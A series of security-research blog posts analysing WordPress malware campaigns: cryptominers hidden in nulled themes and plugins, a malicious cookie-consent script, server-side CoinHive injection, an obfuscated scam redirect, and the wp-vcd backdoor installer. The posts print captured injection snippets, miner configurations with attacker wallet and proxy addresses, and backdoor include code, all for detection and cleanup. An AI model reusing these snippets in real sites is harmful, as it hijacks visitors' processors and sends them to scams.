JQuory: Cryptomining in Nulled Themes and Plugins.

Three months ago b>@ninoseki revealed a group of sites with cryptomining scripts inside jquory.js files (yes, jquory instead of jquery).


The attack uses the “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” CoinHive key, takes up 70% of processor time, doesn’t mine on mobile devices and, for some reason, uses the didOptOut function despite the fact that it relies on the coinhive[.]com/lib/coinhive.min.js, which doesn’t involve any opt-out screens.

At the time, PublicWWW had indexed 458 such sites.

That Twitter thread speculated that nulled themes were to blame. Actually, it’s not only nulled themes; nulled WordPress plugins also come with this jquory cryptominer. Below, is what a typical injection in a nulled theme/plugin looks like:

function enqueue_my_scripts() {  wp_enqueue_script( 'wp-internal', 'https://coinhive[.]com/lib/coinhive.min.js', false, false, true );  wp_enqueue_script( 'wp-backend', plugins_url() . '/essential-grid/assets/js/jquory.js', false, false, true );}

As of the beginning of June 2018, we already see 1300 sites with this malicious assets/js/jquory.js script. The “I2OG8vGGXjF7wMQgL37BhqG5aVPjcoQL” site key is still valid and continues to mine Monero

Nulled software is long known for coming with an undisclosed malicious content such as backdoors, unwanted ads, web spam and now cryptominers. Please stay away from pirated themes and plugins if you care about security and reputation of your websites.

Jun 5, 2018 by Denis Sinegubko

Cookie consent script used to distribute malware

Since the new website cookie usage regulations in the EU have come into place, many websites have added a warning on their website about how they use cookies on it and as well, ask for your consent.


This has caused many website owners to look for an easy way to implement this and we recently found one website which was using JavaScript from cookiescript[.]info to display this cookie consent request on their website. When visiting the website for the first time via Chrome, you would get a JavaScript alert saying: “Your computer is infected. You have to check it with antivirus.”

You can try to click Cancel or OK but in both cases you are going to get redirected to a website trying to convince you to buy antivirus software which could be malware. It looks like the website cookiescript.info is the one distributing this malware to unsuspecting users.

The malware we caught, attempted to load JavaScript from here:
cdn.front.to/libs/cookieconsent.min.4.js

That link just redirects to this URL:
hxxp://cdn[.]cookiescript[.]info/libs/cookiescript.min.js

Here is some of the code inside this JavaScript:

As you can see, it’s loading some additional JavaScript; this time it's “hxxp://cdn[.]cookiescript[.]info/libs/detect_ga.js”, and is the one responsible for detecting the user agent, attaching the cookie to your browser. Here is some of the code:

Finally, this code gets loaded. It has the alert message, along with the code responsible for the redirect to the malicious website selling you the antivirus software:

hxxp://jsserver[.]info/alert.php

You can see the code here:

The website cookiescript.info appears to be using Cloudflare to hide its IP addresses, and the domain is protected by WhoisGuard, so there is no easy way to say who owns this website. However, after some more digging, I was able to find some more details.

cookiescript[.]info. 86399 IN NS fred.ns.cloudflare.com.
cookiescript[.]info. 86399 IN NS mia.ns.cloudflare.com.

It appears that cookie-consent.org and front.to are also part of the same network. We also found some evidence which suggests that the malware has been operating for a few months already.

We highly recommend inspecting code before adding it to your website. It's always best for you to host the entire code on your own server instead of an external website which can be compromised or simply be owned by malicious users.

May 29, 2018 by Krasimir Konov

Server-level Cryptominer Injections

During an investigation on a recent case, we came across a malware infection that came directly from the server.

Upon further inspection, we found that there were at least two servers showing the same symptom: cryptominers had been automatically injected into every web page after the</head> or </title> tag. The sites themselves had not been infected. The malware was coming from the web server itself, which modifies web pages on the fly. The servers we have identified so far are 5.196.91.117 and 104.243.40.34, with around 60 and 120 sites respectively.

This is the code being injected (line breaks added for readability):


<script src="hxxps://coinhive[.]com/lib/coinhive.min.js"></script><script>CoinHive.CONFIG.WEBSOCKET_SHARDS = [["ws://176.10.104 .249:8892"]];var miner = CoinHive.Anonymous('49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b');</script>

It's a modification of the common CoinHive miner that uses an alternative proxy (176.10.104.249:8892) and mines directly to this Monero address 49MvxieMYbGSbamYfv2ajQ52KqGATcGttPNhPCb4TXj3B2FimiUav7nF3hSWioTqujByt2cVietKNVwCkVRGX2qpC58N79b.

Any webmasters with websites hosted on either of these servers are recommended to check with their hosting provider to resolve the issue.

Jan 22, 2018 by Cesar Anjos

Naive CoinHive Injections

Since CoinHive domain made it into many blacklists, attackers began avoiding linking to the hosted library file https://coinhive .com/lib/coinhive.min.js. Instead, they uploaded this file to third-party sites. Some of the attempts to get rid of the coinhive.com domain look pretty naive. For example, injecting the whole library code into web pages.


Yes! Some attackers inject all 60+ kilobytes of the CoinHive library into the HTML code of infected web pages. It is hard to miss when you visually inspect code of such pages. It was funny to find that in one case the attackers tried to renamed the miner variable into animation to make the code look more acceptable.

On another site, the library was injected into a web page in an obfuscated format that made it even bigger. Again, the attackers went an extra mile to make it look less suspicious. They added this comment

<!--<script src="https://authedmine.com/lib/authedmine.min.js"></script>-->

Authedmine.com - is a version of the CoinHive JavaScript miner that always asks permission to start mining thus considered an acceptable use of a Monero miner on a website. However in the above case, the obfuscated code was not from authedmine - it was the silent coinhive.com version. No wonder the site begins mining coins full speed without any notifications as soon as you open it.

And by the way, when you copy all the CoinHive library code (even obfuscated) to a third-party site it still makes requests to CoinHive domains, so it's easy to detect and block.

For articles about more sophisticated “cryptojacking” hacks please check our blog.

If your site is a victim of such attacks, we can help to clean and protect it.

Dec 20, 2017 by Denis Sinegubko

Reversed URLs Randomly Redirect to Scams

We are seeing hundreds of infected WordPress sites with the following scripts (in one line) injected in random places in wp_posts table.


$vTB$I_919AeEAw2z$KX=function(n){if (typeof ($vTB$I_919AeEAw2z$KX.list[n]) == "string") return $vTB$I_919AeEAw2z$KX.list[n].split("").reverse().join("");return $vTB$I_919AeEAw2z$KX.list[n];};$vTB$I_919AeEAw2z$KX.list=["'php.nosj.ssalc/cni/xobloot-yendys/snigulp/tnetnoc-pw/moc.itnetaitak.www/​/:ptth'=ferh.​noitacol.tnemucod"];var number1=Math.floor(Math.random() * 5);if (number1=​=3){var delay = 15000;setTimeout(​$vTB$I_919AeEAw2z$KX(0), delay);}

This code randomly (with probability of around 20%), after a timeout of 15 seconds, redirects visitors various scam sites (e.g. “Browser review to win an iPad” or “tech support” scams).

The redirect chains usually include domains like3cal1ingc0nstant3111212[.]tk, 3worthysupp0rt310121[.]tk, techsupport60512123456[.]tk, 2bestsupp0rt310121[.]tk, etc. (they change frequently)and balans.shahterworld[.]org

The very first redirect URL is hard-coded in the reversed form (we see this obfuscation trick quite often) inside the injected scripts. In the above case the redirect code decodes to this

document.location​.href='hxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.php'

It’s is not the only redirect URL used in this campaign. We checked over 200 infected sites and found these 4 URLs – all of them on hacked sites themselves.

hxxp://emarketing-immobilier[.]com/wp-content/plugins/gotmls/safe-load/plugin-settings.phphxxp://www.katiatenti[.]com/wp-content/plugins/sydney-toolbox/inc/class.json.phphxxp://kodmax[.]com/wp-content/plugins/twitter-widget-pro/lib/class.widget.phphxxp://nh70putera[.]com/wp-content/plugins/login-lockdown/plugin-settings.php

As always, if you need a professional help to clean and protect your site, you can count on us.

Dec 14, 2017 by Denis Sinegubko

Using Google and Facebook to aid on distribution

Every now and then I check my spam mail box for interesting malware (yes, I receive a lot of phishing messages and alerts that my payments are overdue), but most of the time is more of the same, effortless malware, lousy written messages and not fun to analyze.


Today I was bored (that time of the year that you need to write tons of reports, sorry boss…) and I decided to follow the trail of some of those links on the messages I got. And the first one was a "pleasant" surprise.

Usually I'd go with checking the message origin and writing about how it was sent and what was used to get control of the site, but this time I'll write about other aspect. (If you are wondering, it is a WordPress site with a vulnerable revslider on the site's theme that allowed the attacker to have privileged access to the site).

For those not fluent in Brazilian Portuguese, this message is telling that I have a payment overdue and a new "boleto" (a common barcode payment method in Brazil) is attached. The interesting part is that they are referring to me by my personal email alias and not the full name, however they got my CPF (Brazil's Social Security Number) correct, probably it's is related to some leaked data (not that uncommon here).

Everything on this message is clickable and all them will send you to the same Google shortened URL. Which translates to the Facebook's fbsbx.com domain, which is used by Facebook as the domain where the attachments shared on chats and groups are stored.

It is pretty interesting that they are relying on such services to "host" their files instead of using another hacked site to store the malware. I monitored this file and although the link was set to expire on Fri, 22 Dec 2017 16:15:47 GMT, it was taken down less than 24h after I receive the email scam, probably by a Facebook malware scan process.

Dec 11, 2017 by Fioravante Souza

WP-VCD Malware Comes with Nulled Themes

Recently we wrote about wp-vcd malware that created rogue WordPress admin users (100010010) and injected spam links.

Our readers noticed that the “nulled” premium theme sites promoted by the injected links (and some other similar sites) had this very wp-vcd malware pre-installed with every downloaded theme.

It’s pretty easy to notice when you check the files inside the downloaded .zip files. All original files have one date, but two files have a different, more recent date:


12914 Dec  4 09:25 functions.php33045 Nov 30 09:33 class.theme-modules.php

And if you check those files, you’ll notice that functions.php has this line of code at the top

<?php if (file_exists(dirname(FILE) . '/class.theme-modules.php')) include_once(dirname(FILE) . '/class.theme-modules.php'); ?>

And class.theme-modules.php (the file that is included by the code added in the functions.php) is the file that installs the wp-vcd malware into the theme and creates the rest malicious files.

The beginning of the file looks like this

<?php //install_code1error_reporting(0);ini_set('display_errors', 0);DEFINE('MAX_LEVEL', 2); DEFINE('MAX_ITERATION', 50); DEFINE('P', $_SERVER['DOCUMENT_ROOT']);$GLOBALS['WP_CD_CODE'] = 'PD9waHANCmVycm9y...long base64-encoded string here followed by installation code......

Providing “nulled” content with backdoors, spam and other types of malware is typical for sites that offer premium software “for free”. We warned against using nulled themes and plugins many times.

Cleaning sites with such malware may be not that easy as it downloads and installs more malware as soon as you begin using the contaminated theme or plugin. And the backdoor it creates allows the bad guys to do almost anything with your site. That’s why a thorough site analysis and cleanup is required. Let us know if you need our help.

Dec 6, 2017 by Denis Sinegubko